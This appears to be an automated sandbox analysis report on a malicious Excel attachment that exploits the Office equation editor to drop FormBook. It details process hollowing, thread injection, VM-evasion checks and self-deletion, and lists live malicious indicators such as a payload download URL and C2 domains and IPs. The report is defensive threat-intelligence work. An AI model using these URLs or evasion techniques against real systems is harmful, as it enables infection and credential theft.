          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: 13-01-21.xlsxStatic file information: File size 1699328 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2208913849.00000000008A9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2208913849.00000000008A9000.00000004.00000020.sdmp
          Source: 13-01-21.xlsxInitial sample: OLE indicators vbamacros = False
          Source: 13-01-21.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.290000.1.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.290000.1.unpack
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00294153 push ebx; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002954AB push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002948AF push edi; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002958B0 push eax; retf
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00293DF9 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E65E9 push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00294153 push ebx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002954AB push cs; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002948AF push edi; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_002958B0 push eax; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00293DF9 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040C8B1 push ss; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415CB8 push esi; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A5F2 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B3FB push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B45C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A5F2 push cs; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0008C8B1 push ss; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00095CB8 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.24972714151
          Source: initial sampleStatic PE information: section name: .text entropy: 7.24972714151
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: 13-01-21.xlsxStream path 'EncryptedPackage' entropy: 7.9998553056 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2768, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 440Thread sleep time: -420000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2756Thread sleep time: -53981s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2712Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1028Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 2728Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000000.2174382544.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.2186933140.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.2186808887.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.2176001386.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2169184444.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.145 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 470000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2177134492.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2177134492.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2174382544.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2177134492.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information31Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing22DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339203 Sample: 13-01-21.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Found malware configuration 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 17 2->15         started        process3 dnsIp4 44 18.195.87.136, 49167, 80 AMAZON-02US United States 10->44 32 C:\Users\user\AppData\Local\...\file1[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->78 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$13-01-21.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Detected unpacking (changes PE section rights) 17->46 48 Detected unpacking (overwrites its own PE header) 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 38 kolamart.com 34.102.136.180, 49169, 49170, 80 GOOGLEUS United States 23->38 40 magnabeautystyle.com 184.168.131.241, 49171, 80 AS-26496-GO-DADDY-COM-LLCUS United States 23->40 42 8 other IPs or domains 23->42 70 System process connects to network (likely due to code injection or exploit) 23->70 27 raserver.exe 23->27         started        signatures13 process14 signatures15 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 76 Tries to detect virtualization through RDTSC time measurements 27->76 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          13-01-21.xlsx30%VirustotalBrowse
          13-01-21.xlsx23%ReversingLabsDocument-Office.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file1[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.vbc.exe.290000.1.unpack100%AviraHEUR/AGEN.1123467Download File
          5.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          curateherstories.com1%VirustotalBrowse
          kolamart.com5%VirustotalBrowse
          magnabeautystyle.com6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://18.195.87.136/ttkkz/file1.exe100%Avira URL Cloudmalware
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.usmedicarenow.com/bw82/?Ab=gXuD_lh8bfV4RN&x2J8=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==0%Avira URL Cloudsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          curateherstories.com
          34.102.136.180
          truetrueunknown
          kolamart.com
          34.102.136.180
          truetrueunknown
          magnabeautystyle.com
          184.168.131.241
          truetrueunknown
          www.yjpps.com
          0.0.0.0
          truefalse
            unknown
            ext-sq.squarespace.com
            198.185.159.145
            truefalse
              high
              www.openspiers.com
              unknown
              unknowntrue
                unknown
                www.curateherstories.com
                unknown
                unknowntrue
                  unknown
                  www.magnabeautystyle.com
                  unknown
